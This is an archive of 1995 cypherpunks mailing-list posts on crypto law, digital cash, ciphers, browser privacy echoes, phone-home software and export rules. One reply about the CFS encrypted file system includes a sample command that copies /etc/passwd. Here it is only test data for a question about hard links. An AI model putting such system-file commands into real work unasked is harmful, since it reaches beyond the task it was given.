From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Wed, 25 Oct 95 11:00:34 PDT
To: cypherpunks@toad.com
Subject: crypto and law enforcement
Message-ID: <199510251800.TAA27945@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


In June, four people were arrested for allegedly producing the illegal
newspaper "radikal" in Rheinland-Pfalz, Germany. One of the main
reasons for imprisonment was that they refused to decrypt the disks
found with them.

The Attorney at the Federal Supreme Court now claims that three disks
have been partially decrypted, but does not reveal the texts to the
defense counsel because that could be "a danger to the
investigations". The fact that the accused did not help in decryption
is seen as an indicator for danger of collusion, so they will remain
imprisonned on remand.

It seems that these four people will face several years of
imprisonment mainly because one of them chose a weak passphrase.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 25 Oct 95 11:02:04 PDT
To: cypherpunks@toad.com
Subject: arg
Message-ID: <199510251801.TAA27975@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Frissell:

"The average seasoned citizen pays a higher percentage of his income for
medical expenses today than he did in 1964 before the passage of Medicaid."

      Do you set aside a quiet hour every day to think up this crap?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 25 Oct 95 19:55:34 PDT
To: cypherpunks@toad.com
Subject: Let's Not Merge Mailing Lists, OK?
Message-ID: <acb4444702021004b728@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



There's been an upsurge in "cross-mailed" messages, with Cypherpunks copied
on "www-buy-blah-blah," and vice versa, and Cypherpunks copied on the
growing number of lobbyist lists (EPIC, EFF, etc.). A lot of this is not
new, but some of the cross-posts between our list and the various "Net
commerce" and like groups are causing debates to blur.

This message drove it home for me:

-----begin excerpt-----

From: ali@eit.COM (Ali Bahreman)
Date: Wed, 25 Oct 1995 15:28:00 -0700
To: ali@eit.COM, dnew@sgf.fv.com, www-buyinfo@allegra.att.com, ljo@ausys.se
Subject: Digital Cash, Privacy, Anonymity, Double spending protection and
Cheating protection
Cc: cypherpunks@toad.com
Reply-To: bahreman@eit.COM
X-Sun-Charset: US-ASCII
Sender: owner-cypherpunks@toad.com
Precedence: bulk

Let's think out loud here for a minute...  I am sending this to Cypherpunks to
see if someone out there has already thought of a solution to this.

Alice wants to get a file from Bob and wants to pay him $1 using some Digital
Cash scheme.

- Do we want Alice's identity to remain Anonymous (and Bob's too)? (Note that
  this means that neither party knows who the other really is.  They could be
  using aliases to conceal their real identity.)

... rest of speculations about crypto elided....

----end excerpt----

I don't know if "ali@eit.COM (Ali Bahreman)" is subscribed to the
Cypherpunks list or not. From the nature of his comments, I suspect not.

There is great danger in constantly "casting the net wider," in trying to
reach more and more people. I understand the temptation for some on both
lists to cross-post some messages. I urge that they do this, as Bob H. has
done on occasion, by personally forwarding the message, with only _one_ of
the lists getting it. (This because the real danger is as above, where
multiple lists are in the recipient or cc: fields, and followups semi-spam
multiple lists.)

Clearly we cannot have our list used to educate others on other lists. Or,
rather, I'm finding it hard enough to stay on top of a list with 1200+
subscribers. Adding people from other lists, at varying levels of
competence in areas we think important, will simply be too much.

For me, at least.

For now, I plan to filter out stuff that gets echoed over from www-buy, as
I can't keep track of their conversations as well as our own.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: QLDM75A@prodigy.com (MR ELDON B JENKINS)
Date: Wed, 25 Oct 95 18:16:38 PDT
To: cypherpunks@toad.com
Subject: The real value of munition t-shirts (Re:
Message-ID: <013.03574796.QLDM75A@prodigy.com>
MIME-Version: 1.0
Content-Type: text/plain


> I've found that the real value of my shirt is the fact that it's  
> a valuable cypherpunk detector device for strangers who have come 
> up to me and said,"Wow!  Is that the shirt I've heard so much about.
. are 
> you really a cypherpunk... hey there nice perl... " etc. etc. etc.  
I've 
> been approached about it at a Taco Bell, at the movies, and 
> at a favorite coffee house of mine (several times, in fact).  One 
night I 
> wore it to a dance club here in Baltimore, and no less than 6 
people, all 
> of whom I had never met before, approached me about it and wanted 
to talk 
> about cypherpunk issues.  None of them were on the list.
----------------------------------------------------------------------
--------------------------------------
Same here.  I also find that it is a good way to let other people -
know- about
ITAR and crypto.  At school I have had around 20 people ask me about 
it.  From
students to teacher to administration.  I also wore mine to a dance 
club here in 
Salt Lake City and was approached by a few people.  I think it is a 
good way to
at least let people know about the situation.  Makes some news 
friends also.

Eldon Jenkins
PRODIGY Tech Support

===================
Usual disclaimer
===================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 25 Oct 95 21:16:53 PDT
To: cypherpunks@toad.com
Subject: Re: Welcome to cypherpunks
Message-ID: <9510260413.AA10784@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
>      Why am I getting this when I am already subscribed to the list??????
>      

Because someone signed the list up to the list...probably inadvertently.
They probably sent something to majordomo with a line like:

subscribe cypherpunks cypherpunks@toad.com

thinking it actually made sense for some reason...then again they might
have done it on purpose.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Wed, 25 Oct 95 18:20:44 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto's Role in Evil?
Message-ID: <9510260117.AA03480@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


I wrote:

>Date: Tue, 24 Oct 95 12:52:40 EDT
>In-Reply-To: Timothy C. May's message of Mon, 9 Oct 1995 11:20:41 -0700 <199510100354.UAA10505@comsec.com>
>Subject: Re: Crypto's Role in Evil?

>I heard a particularly scary quote from Director Freeh last Sunday on NPR's
>Weekend Edition (I believe that was the show -- segment A-1) in which he
>declared "our job is to protect the people".

The show was Thursday 10/19, All Things Considered.

BTW, there was another interesting quote on the 15th on ATC -- a segment
about the DA office in New Orleans -- with a DA claiming that the
presumption of innocence is a legal fiction which *starts* when the trial
starts -- implying that from arrest to trial, the person is guilty.

Interesting way of thinking....

 - Carl

 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme            |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +---------------------------------------------- Jean Ellison (aka Mother) -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 25 Oct 95 21:50:22 PDT
To: cypherpunks@toad.com
Subject: Re: E-mail Spy
In-Reply-To: <199510252241.XAA03507@utopia.hacktic.nl>
Message-ID: <Pine.ULT.3.91.951025214808.27266B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Oct 1995, Anonymous wrote:

> The Wall Street Journal, October 25, 1995.
> 
> 
> A '90s Espionage Tale Stars Software Rivals, E-Mail Spy
> 
> By Glenn Simpson

Intriguing story!

> The final twist: Performix last week agreed to be acquired by
> Pure Software Inc., a publicly held firm as large as Mercury
> Interactive-which now will be up against someone its own size.

All I can say to this is DAMN! Pure Software offered me a job when they
were just a start-up, and I turned them down. 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: btmoore@iquest.net (Benjamin T. Moore)
Date: Wed, 25 Oct 95 19:58:11 PDT
To: Ian Goldberg <cypherpunks@toad.com
Subject: Re: Mandatory ID in California?
Message-ID: <m0t8IVw-00036cC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 08:45 AM 10/25/95 -0700, Ian Goldberg wrote:
>>From "The Daily Californian", Wed., 25 October, 1995, page 3:
>
><snip>
>"Police were called to the scene by an officer who passed Burton
>and smelled marijuana smoke, Phelps said.  The officer believed
>it was coming from Burton's cigarette.
>
>"The officer issued a citation to Burton for smoking marijuana
>and requested to see identification.  Burton refused to show
>identification and argued that smoking marijuana is legal in
>Berkeley, Phelps said.
>
>"The officer, in accordance with police policy, arrested Burton
>for refusing to properly identify himself."
><snip>
>
>That last sentence seemed ominous to me...
>
>   - Ian
>
Actually, "Failure to Identify" is a misdemeanor in most municipalities nationwide.
It is definitely so here in Indiana, and in most places I've been to. The only thing
surprising is that YOU were not aware of this! :-) The point being the Cops always
want to know who they're fuc... er, dealing with. The first thing they'll do is radio
in who they're accous... er, stopping. The reason for this is, should they get their
just desserts... I mean come to some harm, the rest of their gang... I mean, 
brother officers will know who to come after! :-)

Benjamin T. Moore, Jr.
(Jian #AJF IRChat)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMI7qioSAJOVFNaChAQG4pAf+MzOXKt3SvEkPiOERTGBGsz1SpJk7/XR2
8L0FeCfWcrVsxiPunXz58ekqeSXuiWy0y4bx+zu4TMo8Rq/rgwlzyYAcztI+FMnn
VmA562w5RUMmwPZ6UznrRYpaOcycUeQ4ewEdVyCqogR7L3Itm14Jwd8QEekEyUGz
BVNoZEc5XQReCKQU2WVFDA1Q6ycyc1IZDcQE0JIjTXVD8L8wTr2LgHXD7pHKEsmA
/jfHfNj0Gm0v2SQTWOtY0UL219UaniWuwU3R+GuDJd/YtpizyTQpDZDPHjsZhAs9
lvgevrvFBRluvLdI2oDk47L6n1qnnzPCy73uQ/GFGlyKsumizFOtqw==
=qtGt
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Wed, 25 Oct 95 15:13:42 PDT
To: cypherpunks@toad.com
Subject: CTCP
Message-ID: <Pine.3.89.9510252311.A410-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



If Maude X (the author of CTCP) is still on the list, can they contact 
me, as I've been playing with it in the last few days and have added new 
features and increased the RNG security somewhat. If they're not around 
I'll release an updated 'unofficial' version in a week or two.

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 25 Oct 95 15:41:38 PDT
To: cypherpunks@toad.com
Subject: E-mail Spy
Message-ID: <199510252241.XAA03507@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



The Wall Street Journal, October 25, 1995.


A '90s Espionage Tale Stars Software Rivals, E-Mail Spy

By Glenn Simpson


Technothriller novelist Tom Clancy might have a hard time
dreaming this one up.

In a computer-age case of spy vs. spy, a small software firm
is claiming to have uncovered an industrial espionage attempt
by a much larger competitor by using a controversial e-mail
program.

Court documents and interviews tell a tale of intrigue,
deception and twist upon twist. Not to mention the alleged
involvement of a mysterious "classified government agency."

The protagonist is Performix Inc., a closely held
eight-year-old firm in McLean, Va., that has carved out a
significant niche for itself producing Empower, a software
program used for "load testing," which measures the ability of
a software program to serve many users simultaneously. Every
major computer manufacturer now uses Empower.

Enter Mercury Interactive Corp., a $300 million publicly
traded California firm that also is in the business of selling
software-testing products and produces competing software
called Load Runner. In June 1995, a senior Mercury Interactive
official, Graham Burnette, allegedly wrote to Performix
inquiring about a possible corporate alliance to develop
load-testing software. Performix spurned the offer.

Around the same time, a Virginia businessman named Joel
Dietrich, president of an obscure company called Styx Systems,
approached Performix asking to try out a version of Empower
known as Empower/CS on behalf of an anonymous client.
According to Performix, Mr. Dietrich said he couldn't identify
the client because it was a federal government intelligence
agency. On June 16 Performix granted Mr. Dietrich and Styx a
short-term license to use Empower/CS.

At 1:55 a.m. on Saturday, July 29, Performix received a most
curious e-mail message over the Internet. The message
indicated that someone who wasn't authorized to do so was
trying to install Empower/CS on a large computer and examine
its "source codes" -- the software's secret programming
language. A feature Performix had embedded in Empower/CS
automatically causes an e-mail alert to be sent to Performix
whenever there are indications the software is being used
improperly.

The e-mail indicated the address from which it had been sent:
"merc-int.com." This is the registered Internet address of
Mercury Interactive.

The e-mail also gave the name of the network on which someone
was installing the copy of Empower/CS: "testrun.mercury."

The license number of the software apparently now in Mercury
Interactive's hands, the e-mail further indicated, was the
license number of the copy that had been leased to Styx.

While Mercury Interactive and Mr. Dietrich have disavowed any
knowledge of a possible software transfer, Mercury
Interactive's Mr. Burnette acknowledged in an interview that
Mr. Dietrich's daughter and son-in-law work for Mercury
Interactive.

In mid-August, in U.S. District Court in Alexandria, Va.,
Performix sued Mercury Interactive, Styx and Dietrich,
alleging copyright infringement, fraud, conversion, unfair
competition, breach of contract and unjust enrichment.
Performix alleges Mercury Interactive "acquired Empower/CS so
that it could unlawfully, willfully and maliciously copy, use
and/or reverse engineer Empower/CS for the purpose of
improving the performance and features of existing Mercury
Interactive products in an attempt to gain significant
economic advantage."

Mercury Interactive hasn't yet formally responded to the
allegations, but Mr. Burnette denied any wrongdoing by the
company. "Mercury Interactive has a very strong policy against
industrial espionage," he said. "We don't do it."

Mr. Dietrich's response filed with the court has raised some
eyebrows. While claiming no knowledge of any transfer to
Mercury, he hasn't backed away from his claim to be working
for the federal government. Indeed, Mr. Dietrich is asserting
that he is immune from the suit because he was acting as an
agent of the U.S. government. He claims in court papers that
he obtained the software on behalf of "a classified government
agency."

None of the parties to the case who were willing to be
interviewed said they knew the identity of the agency, and Mr.
Dietrich didn't respond to interview requests. However, Mr.
Burnette of Mercury Interactive said: "I know that Mr.
Dietrich works as a contractor for a government agency. I know
it's a secret government agency, but I don't know what it is."

Officials of both Mercury Interactive and Performix said the
two firms have reached a tentative settlement, although they
disagree on what it contains. "Everything Performix needed
from a business perspective they received, including the
ability to review Mercury Interactive product releases," said
Performix attorney Nelson Blitz. In addition, "money will be
paid to Performix under this agreement in principle." But Mr.
Burnette asserted that no money would change hands.

The penultimate turn: Mr. Burnette claims that Performix is
eager to settle the case because it has a problem of its own.
He contends that it is illegal to secretly embed in commercial
software code a program that causes the customer's computer to
send out e-mail. Mr. Blitz of Performix denied there was
anything legally questionable about the practice and said
Mercury Interactive never raised that issue in settlement
negotiations. He also said the feature isn't intended to be a
spycatcher. Rather, he said, it is meant solely to help
clients who are improperly installing the product by alerting
Performix that they need help. Empower's documentation informs
customers of the feature, he added.

James Haggard, president of Vasco Data Security Inc., said the
purpose of such programs is ambiguous, and it would be hard to
rebut Performix's claim that the feature is merely meant to
serve the customer. He noted that Microsoft Corp.'s new
Windows 95 software contains a program that can send Microsoft
a report on the software products being used by those who sign
up for its on-line service albeit only with the users'
permission. While critics label it a means of economic
snooping, the company says the program simply helps it assist
customers.

"The concept of a program calling home of its own accord" is
controversial in the computer industry, said computer security
expert Samuel Bellovin of Bell Labs. "People tend to get very
upset when it happens," he said, because it can look as if the
software maker is spying on them.

The final twist: Performix last week agreed to be acquired by
Pure Software Inc., a publicly held firm as large as Mercury
Interactive-which now will be up against someone its own size.

-----


[How many CompSecExp S. Bellovins o'BellLabs?]









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Goh Seow Hiong <shgoh@ncb.gov.sg>
Date: Wed, 25 Oct 95 19:18:59 PDT
To: cypherpunks@toad.com
Subject: symmetric key algorithms
Message-ID: <Pine.3.89.9510261019.A29735-0100000@gallery.ncb.gov.sg>
MIME-Version: 1.0
Content-Type: text/plain



Could anyone comment on the acceptability and reliability of the 
SAFER algorithm, in comparison with other algorithms such as IDEA,
Triple-DES, DES, RC4, ....  Has there been any comparison paper 
written on the pros and cons of the different symmetric key algorithms?

Thanks..

SH





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Johnson@Colorado.EDU (Richard Johnson)
Date: Thu, 26 Oct 95 09:19:31 PDT
To: cypherpunks@toad.com
Subject: HTTP Request-Header & Server Environment Echoes
Message-ID: <v02130500acb55ea73e82@[204.131.233.57]>
MIME-Version: 1.0
Content-Type: text/plain


<HTML>
<HEAD>
    <TITLE>What Your Browser Says Behind Your Back</TITLE>
</HEAD>
<BODY>
<PRE><TT>

The

    what your browser told me about you when you weren't looking

echo CGI at UIUC mentioned on cypherpunks (http://www.hks.net/cpunks/
cpunks-9/0095.html) in Nov. 1994 seems to be down for the count (it was
http://www.uiuc.edu/cgi-bin/printenv )).  It would provide you with a page
showing the information your browser had given to the server in the HTTP
Request-Header.

However, others exist to take up the slack. Here's a directory I compiled
today (thanks to WWWW, Lycos, etc.) of current, working HTTP
Request-Header and resulting server environment variable echoes. I'm sure
I've missed some, if not many. Follow up with additions, if you want.
Better yet, add these and the additions to your favorite privacy and
security pages.

HTTP Request-Header Echoes

Machine Information at MIT (http://www.mit.edu:8001/machine)
    Feeds back your machine name, IP address, and finger info.  Not really
    a request-header echo at all, but useful.

Echo at TU-Berlin (http://www.cs.tu-berlin.de/sui/eserte/cgi-rcs/home/
eserte/.public_html/index.html
    Raw text echo of your HTTP request-header info.

Echo by Pierre Omidyar at best.com (http://www.best.com/~pierre/printenv.
cgi) and at ebay.com (http://www.ebay.com/printenv.cgi)
    Two paths for reaching the same CGI script. Produces nicely formatted
    HTML output showing your HTTP request-header info. Simple perl source
    for the script is available from Pierre's Web Tips (http://www.best.
    com/~pierre/web-authoring.html) page.

Echo by mjd at cis.upenn.edu (http://www.cis.upenn.edu/cgi-bin/mjd/
printenv)
    Produces formatted HTML echo of your HTTP request-header info.

Echo at hyperreal.com (http://www.hyperreal.com/cgi-bin/printenv)
    Produces plaintext HTML echo of your HTTP request-header info.

Echo at Whithead Institute--MIT (http://www-genome.wi.mit.edu/WWW/
examples/Ch9/printenv.pl
    Produces formatted HTML echo of your HTTP request-header info. Simple
    perl source for this script is available in the Chapter 9 script
    examples (http://www-genome.wi.mit.edu/WWW/examples/Ch9/) from
    Lincoln Stein (http://www-genome.wi.mit.edu/~lstein/)'s book, How to
    Set Up And Maintain a World Wide Web Site (http://www-genome.wi.mit.
    edu/WWW/).

Echo by cloos at io.com (http://www.io.com/cgi-user/cloos/environment)
    Raw text echo of your HTTP request-header info. Also provides a whole
    bunch more, including the script's runtime environment.

And now, again in the original HTML:

</TT></PRE><BR>
The 
<P><CENTER><STRONG><EM>what your browser told me about you when you weren't looking</EM></STRONG></CENTER>
<P>echo CGI at UIUC <A HREF="http://www.hks.net/cpunks/cpunks-9/0095.html">mentioned
on cypherpunks</A> in Nov. 1994 seems to be down for the count (it was http://www.uiuc.edu/cgi-bin/printenv).
It would provide you with a page showing the information your browser had
given to the server in the HTTP Request-Header.<BR>
<BR>
However, others exist to take up the slack. Here's a directory I compiled
today (thanks to WWWW, Lycos, etc.) of current, working HTTP Request-Header
and resulting server environment variable echoes. I'm sure I've missed some,
if not many. Follow up with additions, if you want. Better yet, add these
and the additions to your favorite privacy and security pages.<BR>
<H3>HTTP Request-Header Echoes</H3>
<DL>
<DT>Machine Information at MIT
<DD>Feeds back your machine name, IP address, and finger info. Not really
a request-header echo at all, but useful. 
<DT><A HREF="http://www.cs.tu-berlin.de/sui/eserte/cgi-rcs/home/eserte/.public_html/index.html">Echo
at TU-Berlin</A> 
<DD>Raw text echo of your HTTP request-header info. 
<DT><A HREF="http://www.best.com/~pierre/printenv.cgi">Echo by Pierre Omidyar
at best.com</A> and at ebay.com
<DD>Two paths for reaching the same CGI script. Produces nicely formatted
HTML output showing your HTTP request-header info. Simple perl source for
the script is available from <A HREF="http://www.best.com/~pierre/web-authoring.html">Pierre's
Web Tips</A> page. 
<DT><A HREF="http://www.cis.upenn.edu/cgi-bin/mjd/printenv">Echo by mjd
at cis.upenn.edu</A> 
<DD>Produces formatted HTML echo of your HTTP request-header info. 
<DT>Echo at hyperreal.com
<DD>Produces plaintext HTML echo of your HTTP request-header info. 
<DT><A HREF="http://www-genome.wi.mit.edu/WWW/examples/Ch9/printenv.pl">Echo
at Whithead Institute--MIT</A> 
<DD>Produces formatted HTML echo of your HTTP request-header info. Simple
perl source for this script is available in the <A HREF="http://www-genome.wi.mit.edu/WWW/examples/Ch9/">Chapter
9 script examples</A> from <A HREF="http://www-genome.wi.mit.edu/~lstein/">Lincoln
Stein</A>'s book, <CITE><A HREF="http://www-genome.wi.mit.edu/WWW/">How
to Set Up And Maintain a World Wide Web Site</A></CITE>. 
<DT><A HREF="http://www.io.com/cgi-user/cloos/environment">Echo by cloos
at io.com</A> 
<DD>Raw text echo of your HTTP request-header info. Also provides a whole
bunch more, including the <EM>script's</EM> runtime environment. 
</DL>
</BODY>
</HTML>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@cs.monash.edu.au>
Date: Wed, 25 Oct 95 19:24:55 PDT
To: sjb@universe.digex.net (Scott Brickner)
Subject: Re: A secure cryptosystem with a 40-bit key?
In-Reply-To: <199510251650.MAA24629@universe.digex.net>
Message-ID: <199510260221.MAA29674@molly.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com
  and Scott Brickner <sjb@universe.digex.net>

S.B. writes:
> Jiri Baum writes:
> >.u'u I believe that you were wrong when you expressed a symbol for the
...
> Well, I was definitely oversimplifying things.

No problem. You just have to be careful when you are generating your
wordlist, that's all.

...
> >Yeah, and a huge beast it is. If you can make a YACCable language with
> >one page of rules (say 16 :-) ), *then* I'll be impressed.
> 
> I'm sure that one could be done on one page, but I doubt it would have
...

One would need a great deal of inspiration to make it work. However,
I do think that it is possible.

...
> >> A message written entirely using native Lojban words can be encrypted
> >> in a codebook fashion where the particular codebook to be used is a
> >...
> >You have to be careful here - the structure words (cmavo) are divided
...
> To achieve the goal of the cryptosystem it may not be necessary to
> encode the cmavo, since they have no real meaning on their own, just
...

How about the numerical cmavo? You'd want to encode numbers. And you
don't want people to know they are numbers, because they could
count the digits (to get order of magnitude). Same for spelling cmavo.

How about the tense system? You'd want to encode that because it could
give important hints to locations (and times). Then again you could
probably avoid using the "a little to the north and a long way east" tense
altogether...

How about the attitudinals?

> The selma'o that only have one member are especially meaning-free, as
> they're typically elidable terminators and such.

Like I said, I only glanced at it, but how about NAI and GAI?

...
> >Yes, but the grammatical structure itself may reveal heaps.
> >(Except for trivial statements.)
> 
> In a natural language this might be true, but in Lojban the grammar's
> regularity eliminates much of this information.
...

I'm not sure I'd agree here. I suspect you are overestimating the regularity
of lojban grammar (then again maybe I'm underestimating...).

...
> >Not really; you just need to make sure that you conjugate the coded words.
> >(Ie substitute nouns for nouns, verbs for verbs, etc.)
> 
> Irregularities make this nearly impossible for computers, though.

Yes (though I'd feel quite confident doing it for Esperanto).

> There are also problems due to ambiguity.

Yup. If it's really a problem - ambiguity in language has been with us
for a long time and nobody minds much. But I guess you wouldn't want
arbitrary ambiguity in your text (you could have an interactive coder
which immediately alerts you to all alternative meanings). Or you could
put marks into your text to separate the word parts (like some beginner
Esperanto books do) thus eliminating the problem.

> The even bigger inconvenience with natural laguages comes in defining
> the codebook.
...

I'm sure you could easily find wordlists giving the "first X" words of
Esperanto - you could just standardize on one of them.


Mi esperas ke tio cxi sencas...

Adiaux - Jiri
- --
<jirib@cs.monash.edu.au>     <jiri@melb.dialix.oz.au>     PGP 463A14D5

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMI7wlCxV6mvvBgf5AQG2nAQA66Xej6FaC0cRfQXXDgr2fP4B/xLgd8J0
orN0/H6yOkyyFYaIFE47PI0/4MbfWD8Myoh9J9JtY/kU6Qji3tBpnS6Mo+gDuCQb
Th2uwECCi0xEEookESI1+bNJXRiEO62YyCIZVLKm0v9DYndSR9FIIr9yytZ7zBO5
WR9SdebT8N8=
=oEqt
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Wed, 25 Oct 95 21:25:28 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
In-Reply-To: <199510241425.HAA06922@jobe.shell.portal.com>
Message-ID: <199510260424.OAA12383@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Hal <hfinney@shell.portal.com>
  and cypherpunks@toad.com

H wrote:
> Jiri Baum <jirib@sweeney.cs.monash.edu.au> writes:
...
> >An interesting question is whether Bob and Nick can now collude to
> >expose Alice. Therefore Alice would at least want to verify that the
...
> 
> I don't think they can.  All Bob sees is his own blinded coin, and the
...

What I meant is, are there any proto-coins that will show through
a blinding? (Mathematically special values like fixed points.)

> However, the timing is a problem.  Bob knows _when_ Alice communicated
...

So it is.

What you'd really want is for Alice to pay for the new coins in ecash.


I'm wondering whether a "coin-changer" would be easier or harder to
set up than a "bank" (from regulatory point of view).

After all, for e-cash you don't really need accounts; you just need:
  - verify coins (coin-changer) ie ecash->ecash
  - buy coins (join the system) ie  cash->ecash
  - sell coins (redeem)         ie ecash->cash

Any cyberspace banks can be completely separate from the ecash issuer.


Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMI8NXixV6mvvBgf5AQEx7AP8Cj+AoVPB5ZhGtWETZ7bi6ZfSC2wRyaFY
/N+nNeYEZcV7ssuOVqIjLG0yUSPjjQbQ2KY3pjZ2ZIyEBz0PfVPg9RX+KnMPvHA8
Bk7dInK0movgUwVHXGn4le6CdSEvO8xBZC2h7YMdR8qaI63ptU/2Evi3kBWi9Vxs
4PbhXz7g2wA=
=v4YS
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Fri, 27 Oct 95 13:34:56 PDT
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: New release of CFS Unix encrypting file system available
In-Reply-To: <199510271954.PAA20647@universe.digex.net>
Message-ID: <199510272036.UAA28683@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


> What happens to hard links?
> 
> mkdir foo bar
> CFS_set_directory_key -directory ./foo -key foo-key
> CFS_set_directory_key -directory ./bar -key bar-key

This isn't how it works.  You "attach" an encrypted directory to a
virtual namespace into which you write (and read) the cleartext.  It's
similar to mounting a file system.

> cp /etc/passwd ./foo/test1
> ln ./foo/footest ./bar/bartest
> cmp ./foo/footest ./bar/bartest

Hard links don't work across different "attached" directories (just as
they don't work across different file systems).

-matt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Patterson <lep@tanju.wsnet.com>
Date: Fri, 27 Oct 95 15:51:39 PDT
To: bluebird@alpha.c2.org
Subject: Re: Need Mail-to-News gates
In-Reply-To: <199510272159.OAA06298@infinity.c2.org>
Message-ID: <Pine.LNX.3.91.951027175407.19464A-100000@tanju.wsnet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Oct 1995 bluebird@alpha.c2.org wrote:

> Could someone PLEASE netmail me some _known reliable_ gates that use the
> straight netmail address format (alt.whatnot@bosco.kollege.edu)?

If someone will direct me to sources, I'll try and setup a gate. (We use 
INN).

Alan Patterson (lep@wsnet.com)        Fngpt: 41D0F61B496FECC09FABECF686AB2A1C
WSNetwork Communications Services, Inc.         PGP Encrypted Email Preferred
Montgomery, Alabama (334) 263-5505 (800) INET-750  Public Key @ MIT keyserver





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@pdcorp.com (Dan Weinstein)
Date: Fri, 27 Oct 95 17:47:15 PDT
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: CJR returned to sender
In-Reply-To: <Pine.SUN.3.91.951027100225.10892F-100000@viper.law.miami.edu>
Message-ID: <199510280045.RAA10830@email.pdcorp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Oct 1995 10:05:10 -0400 (EDT), you wrote:

>And yet people like MIT get approval for the release of PGP this way.
>
>It is clear that 
>1) the government will (verbally?) clear the "PGP procedure" when pushed.

Yes, I believe that they have only ever given verbal agreement to this
sort of thing, which is worth the air it is written on.

>2) they need to be pushed.
>
>If anyone from MIT is reading this, it would be a real public service to 
>put on a web site (a) what the system used for the release of PGP is 
>exactly and (b) what assurances (oral, written, names & dates) was 
>received from State/Commerce that this was legal.

You are assuming that because the government has chosen not to
prosecute MIT that they will not prosecute anyone else.  This is a
faulty assumption, laws are not invalidated if they are not enforced,
only if they are repealed or overturned.

>Publicizing this information would lay the groundwork for APA (or, given
>the way the ITAR is written, maybe no...) and 5th Amendment / due process
>challenges by other parties unable to get the straight answers they
>deserve. 

Their are certainly issues that need to be discussed here, and before
any such discussion can take place we need a determination from the
government as to what sort of verification is adiquite.


Dan Weinstein
djw@pdcorp.com
http://www.earthlink.net/~danjw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
